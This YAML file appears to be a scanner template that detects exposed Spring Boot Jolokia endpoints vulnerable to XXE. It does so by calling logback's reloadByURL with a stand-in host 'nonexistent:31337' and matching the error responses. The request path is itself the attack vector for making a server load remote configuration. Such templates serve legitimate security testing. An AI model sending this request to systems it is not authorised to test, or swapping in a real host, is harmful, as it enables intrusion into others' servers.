id: springboot-actuators-jolokia-xxe

info:
  name: Spring Boot Actuators (Jolokia) XXE
  author: dwisiswant0
  severity: high
  description: todo

requests:
  - method: GET
    path:
      - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
      - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "http:\\/\\/nonexistent:31337\\/logback.xml"
          - "reloadByURL"
          - "JoranException"
        condition: and
        part: body
      - type: word
        words:
          - "X-Application-Context"
        part: header